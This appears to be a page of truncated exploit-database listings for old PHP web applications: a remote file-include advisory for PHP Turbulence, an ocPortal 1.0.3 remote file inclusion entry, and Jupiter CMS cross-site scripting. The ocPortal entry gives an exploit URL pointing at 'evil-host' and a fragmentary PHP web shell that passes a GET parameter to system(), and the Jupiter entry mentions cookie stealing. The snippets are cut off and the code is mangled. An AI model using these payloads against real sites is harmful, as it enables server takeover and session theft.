PHP Turbulence 0.0.1 Turbulence.PHP Remote File Include Vulnerability

No description provided by source. source: http://www.securityfocus.com/bid/23580/info PHP Turbulence is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied data. Exploiting this issue may allow an attacker to compromise the application and the...

ocPortal 1.0.3 - Remote File Inclusion

No description provided by source. http://localhost/ocp-103/index.php?reqpath=http ://evil-host/ On your evil host you must put scipt funcs.php. Example of funcs.php if your host doesn't support php. ?php $com = $GETcom; system $com; ? Example of funcs.php if your host support php. ?php echo '?ph...

Jupiter CMS 1.1.5 - Multiple Cross-Site Scripting Vulnerabilities

Jupiter CMS , to redirect the user to a page of your choice, to avoid suspicion and disclosure of your cookiestealer's location. This injections would allow an attacker to redirect users to a page of his choice, effectively defacing the page:...